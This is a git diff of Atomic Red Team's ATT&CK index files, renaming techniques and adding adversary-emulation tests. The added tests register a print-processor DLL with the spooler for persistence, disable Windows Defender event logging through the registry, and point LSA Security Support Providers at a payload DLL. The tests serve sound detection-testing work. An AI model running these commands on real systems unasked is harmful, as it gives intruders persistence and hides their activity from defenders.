-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -108,7 +108,7 @@
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
-| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index f669b5bd..9487bf27 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -18440,7 +18440,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18480,6 +18480,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32801,7 +32802,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32841,6 +32842,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -42257,7 +42259,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -42278,6 +42280,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml
index e9c263e6..c2d208db 100644
--- a/atomics/Indexes/containers-index.yaml
+++ b/atomics/Indexes/containers-index.yaml
@@ -18388,7 +18388,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18428,6 +18428,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -33163,7 +33164,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -33203,6 +33204,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -42154,7 +42156,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -42175,6 +42177,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml
index 0d39622f..1f8483c6 100644
--- a/atomics/Indexes/google-workspace-index.yaml
+++ b/atomics/Indexes/google-workspace-index.yaml
@@ -18306,7 +18306,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18346,6 +18346,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32725,7 +32726,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32765,6 +32766,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41716,7 +41718,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41737,6 +41739,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml
index 7d0c89da..bd015c73 100644
--- a/atomics/Indexes/iaas-index.yaml
+++ b/atomics/Indexes/iaas-index.yaml
@@ -18248,7 +18248,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18288,6 +18288,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32609,7 +32610,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32649,6 +32650,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41600,7 +41602,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41621,6 +41623,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml
index 95446540..f485c149 100644
--- a/atomics/Indexes/iaas_aws-index.yaml
+++ b/atomics/Indexes/iaas_aws-index.yaml
@@ -18517,7 +18517,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18557,6 +18557,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32878,7 +32879,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32918,6 +32919,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41971,7 +41973,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41992,6 +41994,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml
index be4c1c7a..b567cbca 100644
--- a/atomics/Indexes/iaas_azure-index.yaml
+++ b/atomics/Indexes/iaas_azure-index.yaml
@@ -18407,7 +18407,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18447,6 +18447,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32847,7 +32848,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32887,6 +32888,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41995,7 +41997,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -42016,6 +42018,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml
index f498dab3..08178e98 100644
--- a/atomics/Indexes/iaas_gcp-index.yaml
+++ b/atomics/Indexes/iaas_gcp-index.yaml
@@ -18404,7 +18404,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18444,6 +18444,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32882,7 +32883,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32922,6 +32923,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41947,7 +41949,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41968,6 +41970,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 7d121972..42019d51 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -12725,6 +12725,23 @@ defense-evasion:
'
name: powershell
elevation_required: true
+ - name: Allow Simultaneous Download Registry
+ auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
+ description: 'A registry modification to allow Simultaneous download in the
+ system.
+
+ '
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+ cleanup_command: |
+ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+ name: command_prompt
+ elevation_required: true
T1574.008:
technique:
modified: '2023-03-30T21:01:44.781Z'
@@ -15299,15 +15316,16 @@ defense-evasion:
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+ https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" /v Operational /t REG_DWORD /d 0 /f
+ Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" /v Operational /f >nul 2>&1
+ Defender/Operational" /v Enabled /f >nul 2>&1
'
name: command_prompt
@@ -15317,15 +15335,16 @@ defense-evasion:
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+ https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: 'New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" -Name Operational -PropertyType DWord -Value 0 -Force
+ Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
'
cleanup_command: 'Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" -Name Operational -Force -ErrorAction Ignore
+ Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
'
name: powershell
@@ -33832,7 +33851,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -33872,7 +33891,43 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- atomic_tests: []
+ identifier: T1547.012
+ atomic_tests:
+ - name: Print Processors
+ auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+ description: |
+ Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+ The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+ Note: The test assumes a x64 Windows operating system.
+
+ The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+ supported_platforms:
+ - windows
+ input_arguments:
+ restart:
+ description: set to 1 if you want the computer to reboot as part of the
+ test
+ type: integer
+ default: 0
+ executor:
+ command: |
+ if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+ net stop spooler
+ Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+ reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+ net start spooler
+ if(#{restart}){
+ Restart-Computer
+ }
+ cleanup_command: |
+ net stop spooler
+ rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+ rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+ remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+ net start spooler
+ name: powershell
+ elevation_required: true
T1574.001:
technique:
modified: '2023-03-30T21:01:51.098Z'
@@ -35528,28 +35583,43 @@ privilege-escalation:
- Administrator
identifier: T1547.005
atomic_tests:
- - name: Modify SSP configuration in registry
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+ configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+ description: |
+ Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+ A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+ name: powershell
+ elevation_required: true
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+ Provider configuration in registry
+ auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial
modification of those keys.
supported_platforms:
- windows
- input_arguments:
- fake_ssp_dll:
- description: Value added to registry key. Normally refers to a DLL name
- in C:\Windows\System32.
- type: string
- default: not-a-ssp
executor:
command: |
- # run these in sequence
- $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
- $SecurityPackagesUpdated = $SecurityPackages
- $SecurityPackagesUpdated += "#{fake_ssp_dll}"
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
- # revert (before reboot)
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
